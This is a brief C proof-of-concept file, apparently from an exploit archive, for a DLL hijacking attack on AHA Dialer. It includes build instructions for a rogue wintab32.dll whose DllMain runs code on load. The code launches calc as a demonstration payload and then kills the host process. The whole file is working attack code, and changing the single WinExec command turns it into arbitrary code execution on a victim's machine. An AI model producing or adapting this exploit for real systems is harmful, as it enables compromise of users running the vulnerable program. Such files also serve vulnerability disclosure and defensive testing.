/*
Exploit Title : AHA Dialer 21.005.11.03.224 DLL Hijacking Exploit (wintab32.dll)
Exploit Author : Febriyanto Nugroho < f.nugroho8@gmail.com >
Tested on : Windows 7 (Version 6.1 Service Pack 1) 32-bit
gcc -shared -o wintab32.dll aha-dialer-exploit.c
*/
#include <windows.h>
int exploit() {
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdReason, LPVOID lpvReserved) {
exploit();
return 0;
}